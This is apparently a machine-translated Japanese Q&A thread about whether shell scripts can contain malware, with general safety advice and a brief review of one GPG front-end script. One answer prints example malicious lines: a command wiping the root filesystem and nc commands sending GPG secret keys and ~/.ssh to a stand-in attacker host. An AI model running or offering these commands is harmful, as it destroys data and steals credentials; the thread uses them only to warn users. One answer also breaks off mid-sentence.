.sh ファイルはシェルスクリプトです。それらは .bat に似ています ファイル (cmd スクリプト) Windows で。これらすべて (シェル スクリプト、コマンド スクリプト、.exe Windows 実行可能ファイル、Linux 実行可能ファイル (通常は拡張子がない) は実行可能プログラムです。実行すると、できることは何でもできます。そうです、シェル スクリプトは有害な場合があります。シェル スクリプト (または Perl スクリプト、Python スクリプト、Ruby スクリプトなど) を、他のアプリケーションを扱うのと同じように扱ってください。
疑わしいと思われることなくシェル スクリプトにマルウェアを隠すのは少し難しいです。これは、スクリプト言語の知識がある人が読めるスクリプトだからです。しかし、それほど難しいことではありません。技術的な知識を持っていても、わざわざコードをレビューする人はほとんどいないため、気付かれないことを期待できます。
実際問題として、出回っているマルウェアは Windows よりも Linux の方が少ないです。これはおそらく、デスクトップ上で Linux の市場シェアが Windows よりもはるかに少ないためであり、Linux マルウェアを作成することによる見返りは少なくなります。また、Linux の世界では、Windows の世界よりも、システムの小さな改善点を共有するという文化が長く根付いています。したがって、確率のバランスから、これはマルウェアではなく、誰かが少し改善を共有していると言えます。しかし、それは少しの改善を装ったマルウェアである可能性があります。最後に、このアプリケーションを入手しているサイト、またはこのサイトを推奨した人を信頼できるかどうかを判断する必要があります。ディストリビューションからのプログラム (つまり、ソフトウェア センターからインストールできるプログラム) を優先してください。それらはいくつかのレビューを受けているためです。
さて、この特定のプログラムについて:ざっと見てみると、良性のように見えます。パスワードを何も言わずにどこかに保存したり、宣伝されている以外のことをコンピューター上で実行したりするものは見当たりませんでした。私はわずか 2 分間のレビューしか行っていないことに注意してください。これは、少しでも賢いマルウェア作成者なら誰でもやり過ごすことができます。プログラムはかなりよく書かれているように見えます。
Ubuntuディストリビューションのパッケージでは対処されていない差し迫った必要性を感じない限り、私は必ずしもこのプログラムをお勧めしません. Ubuntuにはタツノオトシゴが付属しています 
GPG への GUI フロントエンド (kgpg もあります) 
KDE ユーザー向け)。 seahorse-nautilus をインストールすることもできます 
(または seahorse-plugin
#!/bin/sh
rm -rf --no-preserve-root /
これはマルウェアであり、シェル スクリプトです。より高度なバージョンには、次のようなものが含まれる場合があります:
gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80
そうです、シェル スクリプトは悪意のあるものになる可能性があります。より複雑になり、他のスクリプト言語やライブラリを呼び出したり、通常の実行可能ファイルを吐き出して呼び出すシェル アーカイブになることさえあります。
ほとんどの場合、実行するものはすべてユーザーのパーミッションを取得します。
もちろん!それはあなたができることは何でもすることができます!ログの監視、キーログの取得、ファイルの盗用など....
開発者がソースコードに書いた内容に応じて!なんでもできる.....
また、作成は非常に簡単なので、疑わしい .sh ファイルが送信された場合は、実行する前によく考えてください!